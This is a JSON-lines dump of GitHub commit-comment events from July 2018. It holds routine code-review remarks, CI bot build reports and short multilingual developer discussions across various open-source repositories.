{"id":"7915687544","type":"CommitCommentEvent","actor":{"login":"TheoWolf"},"repo":{"name":"databrary/datavyu-ffmpegplugin"},"payload":{"comment":{"id":29588755,"position":2441,"line":2441,"path":"src/main/cpp/ffplay.cpp","commit_id":"3e8b549ee47f31c557dffc7eca872efdc74ec718","created_at":"2018-07-04T00:59:01Z","updated_at":"2018-07-04T00:59:01Z","author_association":"CONTRIBUTOR","body":"The Clock requires a pointer to the seial member of the PacketQueue class (See comment in PacketQueue->get_serial())"}},"created_at":"2018-07-04T00:59:01Z"}
{"id":"7915690319","type":"CommitCommentEvent","actor":{"login":"ab116893"},"repo":{"name":"huyle93/mapout-ingredients"},"payload":{"comment":{"id":29588765,"position":null,"line":null,"path":null,"commit_id":"9d12e55341b27bcb34ff5b1f116a3ec72b1d344b","created_at":"2018-07-04T01:00:15Z","updated_at":"2018-07-04T01:00:15Z","author_association":"COLLABORATOR","body":"Readme update with each dependency install for unit test"}},"created_at":"2018-07-04T01:00:15Z"}
{"id":"7915692494","type":"CommitCommentEvent","actor":{"login":"eugenejeonme"},"repo":{"name":"fredriccliver/CheeseBurger"},"payload":{"comment":{"id":29588774,"position":null,"line":null,"path":null,"commit_id":"42e1df766c047bd2d5534e6c54ba405ffaf27c97","created_at":"2018-07-04T01:01:09Z","updated_at":"2018-07-04T01:01:09Z","author_association":"COLLABORATOR","body":"그리고 해당 파일들의 추적을 제외시키려면, 아래 코드를 따라한다.\r\n\r\n`git rm --cached filename`\r\n\r\n예시. `git rm --cached node_modules/`\r\n\r\n**주의! --cached 를 붙이지 않으면, 파일 자체가 지워진다.**"}},"created_at":"2018-07-04T01:01:09Z"}
{"id":"7915693464","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"ZetaGlest/zetaglest-data"},"payload":{"comment":{"id":29588777,"position":null,"line":null,"path":null,"commit_id":"65c3128f859240d6bf47aa4b3112e1ded6dd5945","created_at":"2018-07-04T01:01:34Z","updated_at":"2018-07-04T01:01:34Z","author_association":"MEMBER","body":"![image](https://user-images.githubusercontent.com/16764864/42251264-dd297240-7efb-11e8-9656-817070cffd84.png)\r\n"}},"created_at":"2018-07-04T01:01:34Z"}
{"id":"7915695286","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29588781,"position":null,"line":null,"path":null,"commit_id":"d6d857aacfe49076bf724596ecc5bb2fadba591b","created_at":"2018-07-04T01:02:18Z","updated_at":"2018-07-04T01:02:18Z","author_association":"COLLABORATOR","body":"<h3>tzp tests</h3>\n\nPreview: <strong><a href='https://17832-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17832-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17832-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-04T01:02:18Z"}
{"id":"7915695311","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29588782,"position":null,"line":null,"path":null,"commit_id":"d6a98a17e827a9eb9d9e99fa4e43e940f046024b","created_at":"2018-07-04T01:02:19Z","updated_at":"2018-07-04T01:02:19Z","author_association":"OWNER","body":"#15 "}},"created_at":"2018-07-04T01:02:19Z"}
{"id":"7915704830","type":"CommitCommentEvent","actor":{"login":"NancyL"},"repo":{"name":"LD4P/PerformedMusicOntology"},"payload":{"comment":{"id":29588798,"position":null,"line":null,"path":null,"commit_id":"66976ad0234b7fc160d6af1e3d19e19f3ff1ee2e","created_at":"2018-07-04T01:06:39Z","updated_at":"2018-07-04T01:06:39Z","author_association":"COLLABORATOR","body":"Cleanup of pmo:aggregates and pmo:aggregatedIn definitions. Deletion of pmo:hasAggregatingInstance"}},"created_at":"2018-07-04T01:06:39Z"}
{"id":"7915709555","type":"CommitCommentEvent","actor":{"login":"kyuupichan"},"repo":{"name":"chris-belcher/electrum-personal-server"},"payload":{"comment":{"id":29588809,"position":null,"line":null,"path":null,"commit_id":"5fd8f86b792a14aefb891366ee15390a0c5fc70f","created_at":"2018-07-04T01:08:46Z","updated_at":"2018-07-04T01:08:46Z","author_association":"NONE","body":"This is how Electrum and electrum-server communicated originally.  I've updated the ElectrumX docs for this."}},"created_at":"2018-07-04T01:08:46Z"}
{"id":"7915709861","type":"CommitCommentEvent","actor":{"login":"pkmanglik"},"repo":{"name":"pkmanglik/pythonlearning"},"payload":{"comment":{"id":29588811,"position":null,"line":null,"path":null,"commit_id":"b2116b00b7b08babf610b7a3912306c1172cc2ff","created_at":"2018-07-04T01:08:53Z","updated_at":"2018-07-04T01:08:53Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-04T01:08:53Z"}
{"id":"7915715189","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29588822,"position":null,"line":null,"path":null,"commit_id":"ebed66ff0752790a2f1b7bc21b6fe702bd3e5f31","created_at":"2018-07-04T01:11:15Z","updated_at":"2018-07-04T01:11:15Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/ebed66ff0752790a2f1b7bc21b6fe702bd3e5f31/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-04T01:11:15Z"}
{"id":"7915715550","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29588825,"position":null,"line":null,"path":null,"commit_id":"4f0bac51616c6b1b029c81aeec48a5b775ec562e","created_at":"2018-07-04T01:11:25Z","updated_at":"2018-07-04T01:11:25Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/24/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 143\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/24//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/4f0bac51616c6b1b029c81aeec48a5b775ec562e/24/jenkins-results/api-diff/index.html)\n⚠️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/4f0bac51616c6b1b029c81aeec48a5b775ec562e/24/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\nℹ️ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/4f0bac51616c6b1b029c81aeec48a5b775ec562e/24/jenkins-results/generator-diff/index.html) (please review changes)\n"}},"created_at":"2018-07-04T01:11:25Z"}
{"id":"7915722243","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29588832,"position":null,"line":null,"path":null,"commit_id":"0779e323796132aa5b1c96fccaf6a93e061641af","created_at":"2018-07-04T01:14:16Z","updated_at":"2018-07-04T01:14:16Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.302`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/399828702) :tada:"}},"created_at":"2018-07-04T01:14:16Z"}
{"id":"7915722624","type":"CommitCommentEvent","actor":{"login":"SamuelCarmona83"},"repo":{"name":"SamuelCarmona83/Backend-Suburbuy"},"payload":{"comment":{"id":29588833,"position":null,"line":null,"path":null,"commit_id":"4550375104f62c8c8947acb76483a13cc7d9aba2","created_at":"2018-07-04T01:14:27Z","updated_at":"2018-07-04T01:14:27Z","author_association":"OWNER","body":"Funciona en modo local pero cuando se genera el deploy a Heroku el logfile compila con éxito pero la aplicación no puede ser servida."}},"created_at":"2018-07-04T01:14:27Z"}
{"id":"7915725028","type":"CommitCommentEvent","actor":{"login":"domoritz"},"repo":{"name":"vega/vega-lite"},"payload":{"comment":{"id":29588841,"position":null,"line":null,"path":null,"commit_id":"fe1ff4f26615641fbf8dad6a9b353f566c6f75f1","created_at":"2018-07-04T01:15:30Z","updated_at":"2018-07-04T01:15:30Z","author_association":"MEMBER","body":"Nah, I forgot to unlink."}},"created_at":"2018-07-04T01:15:30Z"}
{"id":"7915725312","type":"CommitCommentEvent","actor":{"login":"micahalcorn"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29588842,"position":null,"line":null,"path":null,"commit_id":"9e59138bf41525230da3ce35ee3c01728710f219","created_at":"2018-07-04T01:15:39Z","updated_at":"2018-07-04T01:15:39Z","author_association":"MEMBER","body":"@joshfraser I was wondering if that column should be renamed to \"Resources\" or something since \"Docs\" is one of the list items."}},"created_at":"2018-07-04T01:15:39Z"}
{"id":"7915725706","type":"CommitCommentEvent","actor":{"login":"SamuelCarmona83"},"repo":{"name":"SamuelCarmona83/Backend-Suburbuy"},"payload":{"comment":{"id":29588843,"position":null,"line":null,"path":null,"commit_id":"2fd0d888021ec1e9c874913377024c3143d30b89","created_at":"2018-07-04T01:15:49Z","updated_at":"2018-07-04T01:15:49Z","author_association":"OWNER","body":"Las imagenes suben con exito pero luego de 15-20 minutos son removidas y retorna un estado 404, en modo local son persistentes y funciona a la perfección."}},"created_at":"2018-07-04T01:15:49Z"}
{"id":"7915727607","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588848,"position":28,"line":28,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:16:40Z","updated_at":"2018-07-04T01:16:40Z","author_association":"MEMBER","body":"Are the internal stack entries helpful in debugging test errors?"}},"created_at":"2018-07-04T01:16:40Z"}
{"id":"7915728417","type":"CommitCommentEvent","actor":{"login":"rcgoodfellow"},"repo":{"name":"ceftb/prototypes"},"payload":{"comment":{"id":29588850,"position":112,"line":76,"path":"model.js","commit_id":"6fd55da9b4ec7349f7abe9872446980f47087c32","created_at":"2018-07-04T01:17:01Z","updated_at":"2018-07-04T01:17:01Z","author_association":"MEMBER","body":"In Cumulus switches, bridge port membership is explicit, so if you want a new port to be a part of an existing broadcasts domain (bridge), the configuration of the bridge needs to be updated to add the new port. See [this configuration](https://github.com/ceftb/prototypes/blob/dcomp/portal/switch/interfaces)"}},"created_at":"2018-07-04T01:17:01Z"}
{"id":"7915730274","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588853,"position":52,"line":51,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:17:55Z","updated_at":"2018-07-04T01:17:55Z","author_association":"MEMBER","body":"Is this not being used anymore?"}},"created_at":"2018-07-04T01:17:55Z"}
{"id":"7915733992","type":"CommitCommentEvent","actor":{"login":"Shigma"},"repo":{"name":"obstudio/Thulium-Music-3"},"payload":{"comment":{"id":29588857,"position":102,"line":84,"path":"themes/simple.scss","commit_id":"d647bd8ad0b8c41e8eea0bbd2d24b17c09b56cc4","created_at":"2018-07-04T01:19:36Z","updated_at":"2018-07-04T01:19:36Z","author_association":"MEMBER","body":"个人建议这个 .binding 的颜色进一步变浅，目前貌似和 .label 的色差较小难以发觉。"}},"created_at":"2018-07-04T01:19:36Z"}
{"id":"7915735569","type":"CommitCommentEvent","actor":{"login":"joshfraser"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29588862,"position":null,"line":null,"path":null,"commit_id":"9e59138bf41525230da3ce35ee3c01728710f219","created_at":"2018-07-04T01:20:14Z","updated_at":"2018-07-04T01:20:14Z","author_association":"MEMBER","body":"I'm fine with \"Resources\".\r\n\r\nWas curious about the breakout between Social and Community. The categories aren't very clear to me. Maybe we just use \"Community\" for both columns?\r\n\r\nAlso wondering if we should change the treatment of the office address and email address. They were valuable in the beginning to communicate that we're a real project, but it's possible we remove them going forward to cut down on spam & prevent folks from stopping by our offices uninvited."}},"created_at":"2018-07-04T01:20:14Z"}
{"id":"7915736172","type":"CommitCommentEvent","actor":{"login":"ronf"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29588863,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-04T01:20:31Z","updated_at":"2018-07-04T01:20:31Z","author_association":"OWNER","body":"This fix should now be available in the 1.13.2 release of AsyncSSH."}},"created_at":"2018-07-04T01:20:31Z"}
{"id":"7915736213","type":"CommitCommentEvent","actor":{"login":"wu-hua-guo"},"repo":{"name":"wu-hua-guo/translate-program"},"payload":{"comment":{"id":29588864,"position":13,"line":13,"path":"trans/trans.pro","commit_id":"aff86678ddd99c13cdc31685fda3ca35c8169870","created_at":"2018-07-04T01:20:32Z","updated_at":"2018-07-04T01:20:32Z","author_association":"OWNER","body":"水电费"}},"created_at":"2018-07-04T01:20:32Z"}
{"id":"7915736950","type":"CommitCommentEvent","actor":{"login":"RobertIndie"},"repo":{"name":"Mouse0w0/lwjglbook-CN-Translation"},"payload":{"comment":{"id":29588867,"position":null,"line":null,"path":null,"commit_id":"225a63b64b787cac6e841bc6ad664e6038da32a7","created_at":"2018-07-04T01:20:50Z","updated_at":"2018-07-04T01:20:50Z","author_association":"CONTRIBUTOR","body":"我觉得不OK，高光分量是图形学的术语，如果翻译成镜像反射太过直译；漫射是漫反射的简称，原文翻译为漫射可以使文章读起来比较紧凑。"}},"created_at":"2018-07-04T01:20:50Z"}
{"id":"7915739807","type":"CommitCommentEvent","actor":{"login":"Creasick"},"repo":{"name":"Creasick/Chatbot_FRA"},"payload":{"comment":{"id":29588877,"position":null,"line":null,"path":null,"commit_id":"b1825359d64951511b4dde8b466d2bf2336a921e","created_at":"2018-07-04T01:22:08Z","updated_at":"2018-07-04T01:22:08Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-04T01:22:08Z"}
{"id":"7915740109","type":"CommitCommentEvent","actor":{"login":"RobertIndie"},"repo":{"name":"Mouse0w0/lwjglbook-CN-Translation"},"payload":{"comment":{"id":29588878,"position":null,"line":null,"path":null,"commit_id":"2fc0a7f7c60b956a1cada02d58d6de3834b9f70b","created_at":"2018-07-04T01:22:15Z","updated_at":"2018-07-04T01:22:15Z","author_association":"CONTRIBUTOR","body":"别把高光直译成镜面反射"}},"created_at":"2018-07-04T01:22:15Z"}
{"id":"7915742078","type":"CommitCommentEvent","actor":{"login":"wooriapt79"},"repo":{"name":"wooriapt/wooriapt.github.io"},"payload":{"comment":{"id":29588881,"position":null,"line":null,"path":null,"commit_id":"0534c57f21f8ee824505d86f65533f4ab8071503","created_at":"2018-07-04T01:23:04Z","updated_at":"2018-07-04T01:23:04Z","author_association":"NONE","body":"https://raw.githubusercontent.com/wooriapt/wooriapt.github.io/master/images/blockchain.jpg"}},"created_at":"2018-07-04T01:23:04Z"}
{"id":"7915743639","type":"CommitCommentEvent","actor":{"login":"micahalcorn"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29588883,"position":null,"line":null,"path":null,"commit_id":"9e59138bf41525230da3ce35ee3c01728710f219","created_at":"2018-07-04T01:23:43Z","updated_at":"2018-07-04T01:23:43Z","author_association":"MEMBER","body":"I'm told that Aure blessed the two columns based and Mitch was working from [this request](https://github.com/OriginProtocol/origin-website/issues/212#issue-332209138)."}},"created_at":"2018-07-04T01:23:43Z"}
{"id":"7915754982","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588909,"position":127,"line":131,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:28:37Z","updated_at":"2018-07-04T01:28:37Z","author_association":"MEMBER","body":"I think I have a better idea of what's going on now."}},"created_at":"2018-07-04T01:28:37Z"}
{"id":"7915758480","type":"CommitCommentEvent","actor":{"login":"bxrz"},"repo":{"name":"ppchu/musicled"},"payload":{"comment":{"id":29588917,"position":null,"line":null,"path":null,"commit_id":"536639ea70e40f94cac9a431a1564dcc96087a42","created_at":"2018-07-04T01:30:12Z","updated_at":"2018-07-04T01:30:12Z","author_association":"NONE","body":"Did you do any Processing with this project for this code? As in, download the processing program to insert this second code and run it? Or did you only use the first code in Arduino IDE and everything worked fine after that (Blynk/LEDs ect)?"}},"created_at":"2018-07-04T01:30:12Z"}
{"id":"7915758602","type":"CommitCommentEvent","actor":{"login":"joshfraser"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29588920,"position":null,"line":null,"path":null,"commit_id":"9e59138bf41525230da3ce35ee3c01728710f219","created_at":"2018-07-04T01:30:14Z","updated_at":"2018-07-04T01:30:14Z","author_association":"MEMBER","body":"I want two columns, just not clear what counts as community vs social. The distinction is a bit blurry to me. I was suggesting a single \"Community\" header that covers both columns, but I don't feel strongly one way or other."}},"created_at":"2018-07-04T01:30:14Z"}
{"id":"7915758828","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588923,"position":108,"line":122,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:30:19Z","updated_at":"2018-07-04T01:30:19Z","author_association":"MEMBER","body":"It might be clearer if we did:\r\n```\r\ntry {\r\n   const tree = mode.apply(expr, settings);\r\n   return tree;\r\n} catch (e) {\r\n    Error.captureStackTrace(e, mode.get);\r\n    throw e;\r\n}\r\n```"}},"created_at":"2018-07-04T01:30:19Z"}
{"id":"7915765401","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29588932,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-04T01:33:13Z","updated_at":"2018-07-04T01:33:13Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2313 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.17%25-green.png)</a>\n"}},"created_at":"2018-07-04T01:33:13Z"}
{"id":"7915765457","type":"CommitCommentEvent","actor":{"login":"walbourn"},"repo":{"name":"Microsoft/DirectXTex"},"payload":{"comment":{"id":29588933,"position":null,"line":null,"path":null,"commit_id":"34c6849d74c07e3e61d26203402bd478a1cbfd43","created_at":"2018-07-04T01:33:15Z","updated_at":"2018-07-04T01:33:15Z","author_association":"MEMBER","body":"See [this pull request](https://github.com/Microsoft/DirectXTex/pull/83)"}},"created_at":"2018-07-04T01:33:15Z"}
{"id":"7915766078","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588934,"position":110,"line":42,"path":"test/setup.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:33:32Z","updated_at":"2018-07-04T01:33:32Z","author_association":"MEMBER","body":"Is `expected` the error?"}},"created_at":"2018-07-04T01:33:32Z"}
{"id":"7915766676","type":"CommitCommentEvent","actor":{"login":"walbourn"},"repo":{"name":"Microsoft/DirectXTex"},"payload":{"comment":{"id":29588940,"position":null,"line":null,"path":null,"commit_id":"707d9acc4973f8458164614f9dd1275aadac21ae","created_at":"2018-07-04T01:33:47Z","updated_at":"2018-07-04T01:33:47Z","author_association":"MEMBER","body":"See [this pull request](https://github.com/Microsoft/DirectXTex/pull/81)"}},"created_at":"2018-07-04T01:33:47Z"}
{"id":"7915768595","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29588951,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-04T01:34:40Z","updated_at":"2018-07-04T01:34:40Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-04T01:34:40Z"}
{"id":"7915771814","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588960,"position":151,"line":149,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:36:09Z","updated_at":"2018-07-04T01:36:09Z","author_association":"MEMBER","body":"What is `expectFail`?  I thought it might be a boolean since we're passing `this.isNot` or `!this.isNot` for this param.  What am I missing?"}},"created_at":"2018-07-04T01:36:09Z"}
{"id":"7915773590","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29588963,"position":20,"line":198,"path":"flink-contrib/flink-statebackend-rocksdb/src/main/java/org/apache/flink/contrib/streaming/state/RocksDBStateBackend.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-04T01:36:53Z","updated_at":"2018-07-04T01:36:53Z","author_association":"OWNER","body":"This won't be the only class, the builder needs to be added for FsStateBackend as well as thats where the new properties are getting added. For the sake of time, i'll probably leave this out and followup with another PR?"}},"created_at":"2018-07-04T01:36:53Z"}
{"id":"7915774551","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588965,"position":528,"line":2995,"path":"test/katex-spec.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:37:18Z","updated_at":"2018-07-04T01:37:18Z","author_association":"MEMBER","body":"Changes to the tests look good!"}},"created_at":"2018-07-04T01:37:18Z"}
{"id":"7915774595","type":"CommitCommentEvent","actor":{"login":"dhreetishah"},"repo":{"name":"dhreetishah/businessCard"},"payload":{"comment":{"id":29588966,"position":null,"line":null,"path":null,"commit_id":"783ca9d8a96add00d27d15d529f190c191f54d21","created_at":"2018-07-04T01:37:19Z","updated_at":"2018-07-04T01:37:19Z","author_association":"OWNER","body":"business card sample"}},"created_at":"2018-07-04T01:37:19Z"}
{"id":"7915776434","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29588969,"position":null,"line":null,"path":null,"commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T01:38:06Z","updated_at":"2018-07-04T01:38:06Z","author_association":"MEMBER","body":"I've done a first pass of this commit."}},"created_at":"2018-07-04T01:38:06Z"}
{"id":"7915777812","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29588972,"position":null,"line":null,"path":null,"commit_id":"dff66115c407b1e644ff03147a43f62d59919846","created_at":"2018-07-04T01:38:42Z","updated_at":"2018-07-04T01:38:42Z","author_association":"COLLABORATOR","body":"1) Genial las ganas que le están metiendo!\r\n2) Ese print... pls...\r\n3)Ojo con los espacios en blanco excesivos.\r\n4)  Para la localización podrían usar un null pattern por ejemplo porque el 0,0 es una valor real... ¿cómo distinguen el valor real del \"falso\"? \r\n5) Ojo! que inicializan todo cada vez al usar el @BeforeEach. En el caso del user tiene sentido porque así \"limpian\" la instancia entre tests. Pero hay casos en los que podría ser trabajo sea innecesario. Tengan cuidado, nada más :) \r\n6) Aprovecho este espacio para comentar cosas generales del proyecto: \r\n-armen jerarquía de carpetas para dividir las cosas. \r\n-Eso de exceder al id del objeto públicamente en primera instancia me hace ruido... justificación? \r\n- Podrían usar una interface por ejemplo para el usuario. Cuando el ranking \"usa\" la clase User... en realidad solo interesa tener \"un objeto\" que cumpla con cierto protocolo. Bien evitando \"violar\" objetos y exponer la estructura interna de User.\r\n- Nombres de clases más explícitos: ej Normal debería ser NormalUser o algo así. Normal no me dice nada... \r\n7) Por el nombre del test y leyendo entre \"líneas\" creo que tienen la intención de hacer un tipo de test e hicieron otro... cuidado. \r\n8) En los tests deberían probar primero el estado inicial (o dan por hecho que arranca bien por otro test que hagan). En este caso les tomo como bien que solo se fijen que cambió la clase, pero para hacerlo completo deberían verificar que las cosas se guardan bien y demás.\r\n9)No entiendo el for del testSecondRanking es un for que inicia en 22 y termina en 42 osea 20...Suponiendo que el usuario se inicializa bien (fijarse punto 5) tienen el mismo caso que en el otro test... (20 comments siendo 20 <22). Hay algo de todo esto que creo que está mal. \r\n9.1) Deduzco por el índice del test segundo que \"sería una continuación del primero\" lo cual está mal. La idea de los tests es que sean independiente entre ellos y se puedan ejecutar en cualquier orden. NO pueden jamás para pasar de que se ejecuten en un orden determinado. \r\n10) Esas preguntas del índice del for las veo innecesarias. ¿No podría hacer el for hasta el número y directamente una vez finalizado ejetuar el assert?\r\n11) Siguiendo con el punto 10, si no se da la condición del if el test pasa igual y no testean nada... \r\nEntonces o el if siempre es true (sería innecesario entonces) o faltan controlar cosas. Tengan en claro que entonces puede dar un falso positivo el test!!!!!! (Van a ver que pasa, pero en realidad no ejecutó ningún assert). \r\n12) Qué tipo de tests son? porque por el nombre imagino una cosa pero el código me indica otra.\r\n13) Si pueden armar carpetas mínimamente diferenciando el tipo de test (integración, unidad etc) los ayudaría. \r\n14) Recuerden que pueden hacer jerarquías de tests, que pueden llamar métodos privados internos de la clase, etc ;) \r\n15) muy bien agregando en un commit el test particular!\r\n"}},"created_at":"2018-07-04T01:38:42Z"}
{"id":"7915779204","type":"CommitCommentEvent","actor":{"login":"TheReyzer"},"repo":{"name":"hippogamesunity/SimpleGif"},"payload":{"comment":{"id":29588977,"position":null,"line":null,"path":null,"commit_id":"c90b737cf1b70846ecc6fa06da53f41fc0872980","created_at":"2018-07-04T01:39:18Z","updated_at":"2018-07-04T01:39:18Z","author_association":"NONE","body":"@hippogamesunity why I find your app amazing, and I use FastHub because I'm studying Java, but I find your app amazing with a lot of potential, I wanted a 1000x1000 image for a higher quality and please do not stop updating that app."}},"created_at":"2018-07-04T01:39:18Z"}
{"id":"7915787486","type":"CommitCommentEvent","actor":{"login":"pittsunkana"},"repo":{"name":"pittsunkana/proruby"},"payload":{"comment":{"id":29588992,"position":null,"line":null,"path":null,"commit_id":"4f4c277316873782feb684909f101229ad47f5d2","created_at":"2018-07-04T01:42:48Z","updated_at":"2018-07-04T01:42:48Z","author_association":"OWNER","body":"ハッシュのkey valueをシンボルで置き換えた。\r\n単位の定義は変わらないものなので定数としてメソッド外に置き直した"}},"created_at":"2018-07-04T01:42:48Z"}
{"id":"7915793706","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29589001,"position":null,"line":null,"path":null,"commit_id":"6732af10e9174c868938d10e944a8bd4cb2a50ca","created_at":"2018-07-04T01:45:30Z","updated_at":"2018-07-04T01:45:30Z","author_association":"CONTRIBUTOR","body":"Why not make it generic ?\r\n```\r\n*/AdblockDetector/handler.min.js$script,important,redirect=noopjs\r\n```\r\nother examples\r\n\r\nhttps\\://digiex.net/\r\nhttps\\://www.antronio.cl/\r\nhttps\\://forum.turkdevs.com/\r\n"}},"created_at":"2018-07-04T01:45:30Z"}
{"id":"7915794342","type":"CommitCommentEvent","actor":{"login":"ejgallego"},"repo":{"name":"coq/coq"},"payload":{"comment":{"id":29589006,"position":7,"line":241,"path":"configure.ml","commit_id":"cd45eda96c0026fc8962ba51b3e3750be946b96f","created_at":"2018-07-04T01:45:44Z","updated_at":"2018-07-04T01:45:44Z","author_association":"MEMBER","body":"I support this."}},"created_at":"2018-07-04T01:45:44Z"}
